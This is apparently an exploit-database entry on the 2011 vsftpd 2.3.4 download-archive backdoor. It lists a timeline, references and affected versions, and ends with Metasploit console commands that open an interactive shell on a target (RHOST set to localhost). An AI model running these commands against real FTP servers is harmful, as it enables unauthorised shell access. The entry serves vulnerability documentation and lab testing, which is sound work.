Timeline :
Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04
PoC provided by :
hdm
mc
Reference(s) :
OSVDB-73573
Diff Pastbin
vsftpd alert
Affected version(s) :
vsftpd-2.3.4 from 2011-06-30 to 2011-07-03
Tested on Ubuntu Lucid 10.04.1 LTS with :
vsftpd-2.3.4
Description :
This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Commands :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploitid
uname -a